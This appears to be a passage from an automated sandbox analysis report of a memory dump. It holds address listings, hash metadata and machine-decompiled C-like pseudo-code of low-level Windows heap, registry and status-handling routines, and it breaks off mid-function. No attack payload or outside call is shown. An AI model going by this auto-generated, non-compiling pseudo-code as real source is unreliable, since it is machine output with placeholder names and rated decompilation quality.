                                                                                                            0x010904af
                                                                                                            0x010904b2
                                                                                                            0x010904b7
                                                                                                            0x010904b9
                                                                                                            0x010904bb
                                                                                                            0x010904bd
                                                                                                            0x010904bf
                                                                                                            0x010904c5
                                                                                                            0x010904c9
                                                                                                            0x010d4d53
                                                                                                            0x010d4d59
                                                                                                            0x010d4db9
                                                                                                            0x010d4dba
                                                                                                            0x010d4dbf
                                                                                                            0x010d4dc2
                                                                                                            0x010d4dc4
                                                                                                            0x010d4dc7
                                                                                                            0x010d4dce
                                                                                                            0x00000000
                                                                                                            0x010d4dce
                                                                                                            0x010d4d5b
                                                                                                            0x010d4d61
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d63
                                                                                                            0x010d4d69
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d6b
                                                                                                            0x010d4d6e
                                                                                                            0x010d4d74
                                                                                                            0x010d4d76
                                                                                                            0x010d4d7c
                                                                                                            0x010d4d7e
                                                                                                            0x010d4d84
                                                                                                            0x010d4d89
                                                                                                            0x010d4d8c
                                                                                                            0x010d4d8d
                                                                                                            0x010d4d92
                                                                                                            0x010d4d95
                                                                                                            0x010d4d96
                                                                                                            0x010d4d98
                                                                                                            0x010d4d9a
                                                                                                            0x010d4d9f
                                                                                                            0x010d4da4
                                                                                                            0x010d4da6
                                                                                                            0x010d4da8
                                                                                                            0x010d4daf
                                                                                                            0x010d4db1
                                                                                                            0x010d4db1
                                                                                                            0x010d4daf
                                                                                                            0x010d4da6
                                                                                                            0x010d4d84
                                                                                                            0x010d4d7c
                                                                                                            0x00000000
                                                                                                            0x010d4d74
                                                                                                            0x010904d6
                                                                                                            0x010d4de1
                                                                                                            0x010904dc
                                                                                                            0x010904dc
                                                                                                            0x010904dc
                                                                                                            0x010904e4
                                                                                                            0x010d4deb
                                                                                                            0x010d4df1
                                                                                                            0x010d4df8
                                                                                                            0x010d4dfe
                                                                                                            0x010d4e03
                                                                                                            0x010d4e05
                                                                                                            0x010d4e17
                                                                                                            0x010d4e07
                                                                                                            0x010d4e10
                                                                                                            0x010d4e10
                                                                                                            0x010d4e1c
                                                                                                            0x010d4e1f
                                                                                                            0x010d4e35
                                                                                                            0x010d4e35
                                                                                                            0x010d4e1f
                                                                                                            0x010d4df8
                                                                                                            0x010904f1
                                                                                                            0x010904fa
                                                                                                            0x010d4e3f
                                                                                                            0x010d4e47
                                                                                                            0x010d4e5b
                                                                                                            0x010d4e61
                                                                                                            0x010d4e67
                                                                                                            0x010d4e69
                                                                                                            0x010d4e71
                                                                                                            0x010d4e73
                                                                                                            0x01090500
                                                                                                            0x01090500
                                                                                                            0x01090500
                                                                                                            0x010904fa
                                                                                                            0x01090508
                                                                                                            0x0109051d
                                                                                                            0x0109051d
                                                                                                            0x0109051f
                                                                                                            0x01090524
                                                                                                            0x00000000
                                                                                                            0x01090524
                                                                                                            0x01090515
                                                                                                            0x01090517
                                                                                                            0x010d4e7a
                                                                                                            0x010d4e7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4e85
                                                                                                            0x00000000
                                                                                                            0x010d4e85
                                                                                                            0x00000000
                                                                                                            0x01090517

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 946cc6a63f4f428503956d4d224929a27a45e3a85c1cf0e7b04811dafad8a61a
                                                                                                            • Instruction ID: f72ee230542c191ce829b4c75aa949eb4203e26403a9ae772756d6938cebe3fd
                                                                                                            • Opcode Fuzzy Hash: 946cc6a63f4f428503956d4d224929a27a45e3a85c1cf0e7b04811dafad8a61a
                                                                                                            • Instruction Fuzzy Hash: C191F771E00315EFEF21AA6CC854BAE7BE8AB05714F0502A1F9E1EB6D5DB749D40C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0106C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v1036;
                                                                                                            				signed int _v1040;
                                                                                                            				char _v1048;
                                                                                                            				signed int _v1052;
                                                                                                            				signed char _v1056;
                                                                                                            				void* _v1058;
                                                                                                            				char _v1060;
                                                                                                            				signed int _v1064;
                                                                                                            				void* _v1068;
                                                                                                            				intOrPtr _v1072;
                                                                                                            				void* _v1084;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t70;
                                                                                                            				intOrPtr _t72;
                                                                                                            				signed int _t74;
                                                                                                            				intOrPtr _t77;
                                                                                                            				signed int _t78;
                                                                                                            				signed int _t81;
                                                                                                            				void* _t101;
                                                                                                            				signed int _t102;
                                                                                                            				signed int _t107;
                                                                                                            				signed int _t109;
                                                                                                            				signed int _t110;
                                                                                                            				signed char _t111;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t113;
                                                                                                            				signed int _t114;
                                                                                                            				intOrPtr _t116;
                                                                                                            				void* _t117;
                                                                                                            				char _t118;
                                                                                                            				void* _t120;
                                                                                                            				char _t121;
                                                                                                            				signed int _t122;
                                                                                                            				signed int _t123;
                                                                                                            				signed int _t125;
                                                                                                            
                                                                                                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                                                            				_v8 =  *0x115d360 ^ _t125;
                                                                                                            				_t116 = _a4;
                                                                                                            				_v1056 = _a16;
                                                                                                            				_v1040 = _a24;
                                                                                                            				if(E01076D30( &_v1048, _a8) < 0) {
                                                                                                            					L4:
                                                                                                            					_pop(_t117);
                                                                                                            					_pop(_t120);
                                                                                                            					_pop(_t101);
                                                                                                            					return E010AB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                                                            				}
                                                                                                            				_t70 = _a20;
                                                                                                            				if(_t70 >= 0x3f4) {
                                                                                                            					_t121 = _t70 + 0xc;
                                                                                                            					L19:
                                                                                                            					_t107 =  *( *[fs:0x30] + 0x18);
                                                                                                            					__eflags = _t107;
                                                                                                            					if(_t107 == 0) {
                                                                                                            						L60:
                                                                                                            						_t68 = 0xc0000017;
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_t72 =  *0x1157b9c; // 0x0
                                                                                                            					_t74 = L01084620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                                                            					_v1064 = _t74;
                                                                                                            					__eflags = _t74;
                                                                                                            					if(_t74 == 0) {
                                                                                                            						goto L60;
                                                                                                            					}
                                                                                                            					_t102 = _t74;
                                                                                                            					_push( &_v1060);
                                                                                                            					_push(_t121);
                                                                                                            					_push(_t74);
                                                                                                            					_push(2);
                                                                                                            					_push( &_v1048);
                                                                                                            					_push(_t116);
                                                                                                            					_t122 = E010A9650();
                                                                                                            					__eflags = _t122;
                                                                                                            					if(_t122 >= 0) {
                                                                                                            						L7:
                                                                                                            						_t114 = _a12;
                                                                                                            						__eflags = _t114;
                                                                                                            						if(_t114 != 0) {
                                                                                                            							_t77 = _a20;
                                                                                                            							L26:
                                                                                                            							_t109 =  *(_t102 + 4);
                                                                                                            							__eflags = _t109 - 3;
                                                                                                            							if(_t109 == 3) {
                                                                                                            								L55:
                                                                                                            								__eflags = _t114 - _t109;
                                                                                                            								if(_t114 != _t109) {
                                                                                                            									L59:
                                                                                                            									_t122 = 0xc0000024;
                                                                                                            									L15:
                                                                                                            									_t78 = _v1052;
                                                                                                            									__eflags = _t78;
                                                                                                            									if(_t78 != 0) {
                                                                                                            										L010877F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                                                            									}
                                                                                                            									_t68 = _t122;
                                                                                                            									goto L4;
                                                                                                            								}
                                                                                                            								_t110 = _v1056;
                                                                                                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                            								_v1060 = _t118;
                                                                                                            								__eflags = _t110;
                                                                                                            								if(_t110 == 0) {
                                                                                                            									L10:
                                                                                                            									_t122 = 0x80000005;
                                                                                                            									L11:
                                                                                                            									_t81 = _v1040;
                                                                                                            									__eflags = _t81;
                                                                                                            									if(_t81 == 0) {
                                                                                                            										goto L15;
                                                                                                            									}
                                                                                                            									__eflags = _t122;
                                                                                                            									if(_t122 >= 0) {
                                                                                                            										L14:
                                                                                                            										 *_t81 = _t118;
                                                                                                            										goto L15;
                                                                                                            									}
                                                                                                            									__eflags = _t122 - 0x80000005;
                                                                                                            									if(_t122 != 0x80000005) {
                                                                                                            										goto L15;
                                                                                                            									}
                                                                                                            									goto L14;
                                                                                                            								}
                                                                                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                                                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                                                            									goto L10;
                                                                                                            								}
                                                                                                            								_push( *((intOrPtr*)(_t102 + 8)));
                                                                                                            								_t59 = _t102 + 0xc; // 0xc
                                                                                                            								_push(_t110);
                                                                                                            								L54:
                                                                                                            								E010AF3E0();
                                                                                                            								_t125 = _t125 + 0xc;
                                                                                                            								goto L11;
                                                                                                            							}
                                                                                                            							__eflags = _t109 - 7;
                                                                                                            							if(_t109 == 7) {
                                                                                                            								goto L55;
                                                                                                            							}
                                                                                                            							_t118 = 4;
                                                                                                            							__eflags = _t109 - _t118;
                                                                                                            							if(_t109 != _t118) {
                                                                                                            								__eflags = _t109 - 0xb;
                                                                                                            								if(_t109 != 0xb) {
                                                                                                            									__eflags = _t109 - 1;
                                                                                                            									if(_t109 == 1) {
                                                                                                            										__eflags = _t114 - _t118;
                                                                                                            										if(_t114 != _t118) {
                                                                                                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                            											_v1060 = _t118;
                                                                                                            											__eflags = _t118 - _t77;
                                                                                                            											if(_t118 > _t77) {
                                                                                                            												goto L10;
                                                                                                            											}
                                                                                                            											_push(_t118);
                                                                                                            											_t56 = _t102 + 0xc; // 0xc
                                                                                                            											_push(_v1056);
                                                                                                            											goto L54;
                                                                                                            										}
                                                                                                            										__eflags = _t77 - _t118;
                                                                                                            										if(_t77 != _t118) {
                                                                                                            											L34:
                                                                                                            											_t122 = 0xc0000004;
                                                                                                            											goto L15;
                                                                                                            										}
                                                                                                            										_t111 = _v1056;
                                                                                                            										__eflags = _t111 & 0x00000003;
                                                                                                            										if((_t111 & 0x00000003) == 0) {
                                                                                                            											_v1060 = _t118;
                                                                                                            											__eflags = _t111;
                                                                                                            											if(__eflags == 0) {
                                                                                                            												goto L10;
                                                                                                            											}
                                                                                                            											_t42 = _t102 + 0xc; // 0xc
                                                                                                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                                                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                                                            											_push(_t111);
                                                                                                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                                                            											_push(0);
                                                                                                            											_push( &_v1048);
                                                                                                            											_t122 = E010A13C0(_t102, _t118, _t122, __eflags);
                                                                                                            											L44:
                                                                                                            											_t118 = _v1072;
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            										_t122 = 0x80000002;
                                                                                                            										goto L15;
                                                                                                            									}
                                                                                                            									_t122 = 0xc0000024;
                                                                                                            									goto L44;
                                                                                                            								}
                                                                                                            								__eflags = _t114 - _t109;
                                                                                                            								if(_t114 != _t109) {
                                                                                                            									goto L59;
                                                                                                            								}
                                                                                                            								_t118 = 8;
                                                                                                            								__eflags = _t77 - _t118;
                                                                                                            								if(_t77 != _t118) {
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								_t112 = _v1056;
                                                                                                            								_v1060 = _t118;
                                                                                                            								__eflags = _t112;
                                                                                                            								if(_t112 == 0) {
                                                                                                            									goto L10;
                                                                                                            								}
                                                                                                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                                                            								goto L11;
                                                                                                            							}
                                                                                                            							__eflags = _t114 - _t118;
                                                                                                            							if(_t114 != _t118) {
                                                                                                            								goto L59;
                                                                                                            							}
                                                                                                            							__eflags = _t77 - _t118;
                                                                                                            							if(_t77 != _t118) {
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							_t113 = _v1056;
                                                                                                            							_v1060 = _t118;
                                                                                                            							__eflags = _t113;
                                                                                                            							if(_t113 == 0) {
                                                                                                            								goto L10;
                                                                                                            							}
                                                                                                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                            						__eflags = _t118 - _a20;
                                                                                                            						if(_t118 <= _a20) {
                                                                                                            							_t114 =  *(_t102 + 4);
                                                                                                            							_t77 = _t118;
                                                                                                            							goto L26;
                                                                                                            						}
                                                                                                            						_v1060 = _t118;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					__eflags = _t122 - 0x80000005;
                                                                                                            					if(_t122 != 0x80000005) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					L010877F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                                                            					L18:
                                                                                                            					_t121 = _v1060;
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            				_push( &_v1060);
                                                                                                            				_push(0x400);
                                                                                                            				_t102 =  &_v1036;
                                                                                                            				_push(_t102);
                                                                                                            				_push(2);
                                                                                                            				_push( &_v1048);
                                                                                                            				_push(_t116);
                                                                                                            				_t122 = E010A9650();
                                                                                                            				if(_t122 >= 0) {
                                                                                                            					__eflags = 0;
                                                                                                            					_v1052 = 0;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				if(_t122 == 0x80000005) {
                                                                                                            					goto L18;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}











































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4f65785d763469b43088a3df32fcd9d445ccc129a7898c39cca97235adc085ef
                                                                                                            • Instruction ID: ff5618390b6f28e911b493b4030a5f7176aa34d75773fd3ca89737e6bc056995
                                                                                                            • Opcode Fuzzy Hash: 4f65785d763469b43088a3df32fcd9d445ccc129a7898c39cca97235adc085ef
                                                                                                            • Instruction Fuzzy Hash: 988193766043028BDB66CE58C880B6EB7E4FB84258F15486AFEC59B245D330DD40CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 39%
                                                                                                            			E010FB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                                            				char _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t83;
                                                                                                            				intOrPtr _t89;
                                                                                                            				signed int _t92;
                                                                                                            				signed char _t106;
                                                                                                            				signed int* _t107;
                                                                                                            				intOrPtr _t108;
                                                                                                            				intOrPtr _t109;
                                                                                                            				signed int _t114;
                                                                                                            				void* _t115;
                                                                                                            				void* _t117;
                                                                                                            				void* _t119;
                                                                                                            				void* _t122;
                                                                                                            				signed int _t123;
                                                                                                            				signed int* _t124;
                                                                                                            
                                                                                                            				_t106 = _a12;
                                                                                                            				if((_t106 & 0xfffffffc) != 0) {
                                                                                                            					return 0xc000000d;
                                                                                                            				}
                                                                                                            				if((_t106 & 0x00000002) != 0) {
                                                                                                            					_t106 = _t106 | 0x00000001;
                                                                                                            				}
                                                                                                            				_t109 =  *0x1157b9c; // 0x0
                                                                                                            				_t124 = L01084620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                                            				if(_t124 != 0) {
                                                                                                            					 *_t124 =  *_t124 & 0x00000000;
                                                                                                            					_t124[1] = _t124[1] & 0x00000000;
                                                                                                            					_t124[4] = _t124[4] & 0x00000000;
                                                                                                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                                            						L13:
                                                                                                            						_push(_t124);
                                                                                                            						if((_t106 & 0x00000002) != 0) {
                                                                                                            							_push(0x200);
                                                                                                            							_push(0x28);
                                                                                                            							_push(0xffffffff);
                                                                                                            							_t122 = E010A9800();
                                                                                                            							if(_t122 < 0) {
                                                                                                            								L33:
                                                                                                            								if((_t124[4] & 0x00000001) != 0) {
                                                                                                            									_push(4);
                                                                                                            									_t64 =  &(_t124[1]); // 0x4
                                                                                                            									_t107 = _t64;
                                                                                                            									_push(_t107);
                                                                                                            									_push(5);
                                                                                                            									_push(0xfffffffe);
                                                                                                            									E010A95B0();
                                                                                                            									if( *_t107 != 0) {
                                                                                                            										_push( *_t107);
                                                                                                            										E010A95D0();
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_push(_t124);
                                                                                                            								_push(0);
                                                                                                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                            								L37:
                                                                                                            								L010877F0();
                                                                                                            								return _t122;
                                                                                                            							}
                                                                                                            							_t124[4] = _t124[4] | 0x00000002;
                                                                                                            							L18:
                                                                                                            							_t108 = _a8;
                                                                                                            							_t29 =  &(_t124[0x105]); // 0x414
                                                                                                            							_t80 = _t29;
                                                                                                            							_t30 =  &(_t124[5]); // 0x14
                                                                                                            							_t124[3] = _t80;
                                                                                                            							_t123 = 0;
                                                                                                            							_t124[2] = _t30;
                                                                                                            							 *_t80 = _t108;
                                                                                                            							if(_t108 == 0) {
                                                                                                            								L21:
                                                                                                            								_t112 = 0x400;
                                                                                                            								_push( &_v8);
                                                                                                            								_v8 = 0x400;
                                                                                                            								_push(_t124[2]);
                                                                                                            								_push(0x400);
                                                                                                            								_push(_t124[3]);
                                                                                                            								_push(0);
                                                                                                            								_push( *_t124);
                                                                                                            								_t122 = E010A9910();
                                                                                                            								if(_t122 != 0xc0000023) {
                                                                                                            									L26:
                                                                                                            									if(_t122 != 0x106) {
                                                                                                            										L40:
                                                                                                            										if(_t122 < 0) {
                                                                                                            											L29:
                                                                                                            											_t83 = _t124[2];
                                                                                                            											if(_t83 != 0) {
                                                                                                            												_t59 =  &(_t124[5]); // 0x14
                                                                                                            												if(_t83 != _t59) {
                                                                                                            													L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                                            												}
                                                                                                            											}
                                                                                                            											_push( *_t124);
                                                                                                            											E010A95D0();
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										 *_a16 = _t124;
                                                                                                            										return 0;
                                                                                                            									}
                                                                                                            									if(_t108 != 1) {
                                                                                                            										_t122 = 0;
                                                                                                            										goto L40;
                                                                                                            									}
                                                                                                            									_t122 = 0xc0000061;
                                                                                                            									goto L29;
                                                                                                            								} else {
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L22:
                                                                                                            									_t89 =  *0x1157b9c; // 0x0
                                                                                                            									_t92 = L01084620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                                            									_t124[2] = _t92;
                                                                                                            									if(_t92 == 0) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									_t112 =  &_v8;
                                                                                                            									_push( &_v8);
                                                                                                            									_push(_t92);
                                                                                                            									_push(_v8);
                                                                                                            									_push(_t124[3]);
                                                                                                            									_push(0);
                                                                                                            									_push( *_t124);
                                                                                                            									_t122 = E010A9910();
                                                                                                            									if(_t122 != 0xc0000023) {
                                                                                                            										goto L26;
                                                                                                            									}
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                                            								}
                                                                                                            								_t122 = 0xc0000017;
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t119 = 0;
                                                                                                            							do {
                                                                                                            								_t114 = _t124[3];
                                                                                                            								_t119 = _t119 + 0xc;
                                                                                                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                                            								_t123 = _t123 + 1;
                                                                                                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                                            							} while (_t123 < _t108);
                                                                                                            							goto L21;
                                                                                                            						}
                                                                                                            						_push(0x28);
                                                                                                            						_push(3);
                                                                                                            						_t122 = E0106A7B0();
                                                                                                            						if(_t122 < 0) {
                                                                                                            							goto L33;
                                                                                                            						}
                                                                                                            						_t124[4] = _t124[4] | 0x00000001;
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					if((_t106 & 0x00000001) == 0) {
                                                                                                            						_t115 = 0x28;
                                                                                                            						_t122 = E010FE7D3(_t115, _t124);
                                                                                                            						if(_t122 < 0) {
                                                                                                            							L9:
                                                                                                            							_push(_t124);
                                                                                                            							_push(0);
                                                                                                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                            							goto L37;
                                                                                                            						}
                                                                                                            						L12:
                                                                                                            						if( *_t124 != 0) {
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					_t15 =  &(_t124[1]); // 0x4
                                                                                                            					_t117 = 4;
                                                                                                            					_t122 = E010FE7D3(_t117, _t15);
                                                                                                            					if(_t122 >= 0) {
                                                                                                            						_t124[4] = _t124[4] | 0x00000001;
                                                                                                            						_v12 = _v12 & 0x00000000;
                                                                                                            						_push(4);
                                                                                                            						_push( &_v12);
                                                                                                            						_push(5);
                                                                                                            						_push(0xfffffffe);
                                                                                                            						E010A95B0();
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				} else {
                                                                                                            					return 0xc0000017;
                                                                                                            				}
                                                                                                            			}




















                                                                                                            0x010fba5d
                                                                                                            0x010fba62
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fba64
                                                                                                            0x010fba67
                                                                                                            0x010fba68
                                                                                                            0x010fba69
                                                                                                            0x010fba6c
                                                                                                            0x010fba6f
                                                                                                            0x010fba71
                                                                                                            0x010fba78
                                                                                                            0x010fba80
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fba90
                                                                                                            0x010fba90
                                                                                                            0x010fba97
                                                                                                            0x00000000
                                                                                                            0x010fba97
                                                                                                            0x010fb9f5
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9fa
                                                                                                            0x010fba03
                                                                                                            0x010fba07
                                                                                                            0x010fba0c
                                                                                                            0x010fba10
                                                                                                            0x010fba17
                                                                                                            0x00000000
                                                                                                            0x010fb9f7
                                                                                                            0x010fb9a6
                                                                                                            0x010fb9a8
                                                                                                            0x010fb9af
                                                                                                            0x010fb9b3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fb9b9
                                                                                                            0x00000000
                                                                                                            0x010fb9b9
                                                                                                            0x010fb94d
                                                                                                            0x010fb98f
                                                                                                            0x010fb995
                                                                                                            0x010fb999
                                                                                                            0x010fb960
                                                                                                            0x010fb967
                                                                                                            0x010fb968
                                                                                                            0x010fb96a
                                                                                                            0x00000000
                                                                                                            0x010fb96a
                                                                                                            0x010fb99b
                                                                                                            0x010fb99e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010fb99e
                                                                                                            0x010fb951
                                                                                                            0x010fb954
                                                                                                            0x010fb95a
                                                                                                            0x010fb95e
                                                                                                            0x010fb972
                                                                                                            0x010fb979
                                                                                                            0x010fb97d
                                                                                                            0x010fb97f
                                                                                                            0x010fb980
                                                                                                            0x010fb982
                                                                                                            0x010fb984
                                                                                                            0x00000000
                                                                                                            0x010fb984
                                                                                                            0x00000000
                                                                                                            0x010fb926
                                                                                                            0x00000000
                                                                                                            0x010fb926

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6f234810aad59d70fb87c60aa71550866c0b5e5d8dc53caece58f6dbe071816f
                                                                                                            • Instruction ID: 8156e973ad52cb3067108572314c177903056427896a10c9dc80c91718c6df5c
                                                                                                            • Opcode Fuzzy Hash: 6f234810aad59d70fb87c60aa71550866c0b5e5d8dc53caece58f6dbe071816f
                                                                                                            • Instruction Fuzzy Hash: 4571EF32200706AFE732DF28C846FA6BBE5EB44720F14456CE7D587AA0DB75E944CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 79%
                                                                                                            			E010E6DC9(signed int __ecx, void* __edx) {
                                                                                                            				unsigned int _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				char _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v40;
                                                                                                            				char _v44;
                                                                                                            				char _v48;
                                                                                                            				char _v52;
                                                                                                            				char _v56;
                                                                                                            				char _v60;
                                                                                                            				void* _t87;
                                                                                                            				void* _t95;
                                                                                                            				signed char* _t96;
                                                                                                            				signed int _t107;
                                                                                                            				signed int _t136;
                                                                                                            				signed char* _t137;
                                                                                                            				void* _t157;
                                                                                                            				void* _t161;
                                                                                                            				void* _t167;
                                                                                                            				intOrPtr _t168;
                                                                                                            				void* _t174;
                                                                                                            				void* _t175;
                                                                                                            				signed int _t176;
                                                                                                            				void* _t177;
                                                                                                            
                                                                                                            				_t136 = __ecx;
                                                                                                            				_v44 = 0;
                                                                                                            				_t167 = __edx;
                                                                                                            				_v40 = 0;
                                                                                                            				_v36 = 0;
                                                                                                            				_v32 = 0;
                                                                                                            				_v60 = 0;
                                                                                                            				_v56 = 0;
                                                                                                            				_v52 = 0;
                                                                                                            				_v48 = 0;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_t87 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                                                            				_t175 = _t87;
                                                                                                            				if(_t175 != 0) {
                                                                                                            					_t11 = _t175 + 0x30; // 0x30
                                                                                                            					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                                                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                                                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                                                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                                                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                                                            					E010E6B4C(_t167, _t11, 0x214,  &_v8);
                                                                                                            					_v12 = _v8 + 0x10;
                                                                                                            					_t95 = E01087D50();
                                                                                                            					_t137 = 0x7ffe0384;
                                                                                                            					if(_t95 == 0) {
                                                                                                            						_t96 = 0x7ffe0384;
                                                                                                            					} else {
                                                                                                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            					}
                                                                                                            					_push(_t175);
                                                                                                            					_push(_v12);
                                                                                                            					_push(0x402);
                                                                                                            					_push( *_t96 & 0x000000ff);
                                                                                                            					E010A9AE0();
                                                                                                            					_t87 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                                                            					_t176 = _v16;
                                                                                                            					if((_t176 & 0x00000100) != 0) {
                                                                                                            						_push( &_v36);
                                                                                                            						_t157 = 4;
                                                                                                            						_t87 = E010E795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                                                            						if(_t87 >= 0) {
                                                                                                            							_v24 = E010E795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                                                            							_v28 = E010E795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                                                            							_push( &_v52);
                                                                                                            							_t161 = 5;
                                                                                                            							_t168 = E010E795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                                                            							_v20 = _t168;
                                                                                                            							_t107 = L01084620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                                                            							_v16 = _t107;
                                                                                                            							if(_t107 != 0) {
                                                                                                            								_v8 = _v8 & 0x00000000;
                                                                                                            								 *(_t107 + 0x20) = _t176;
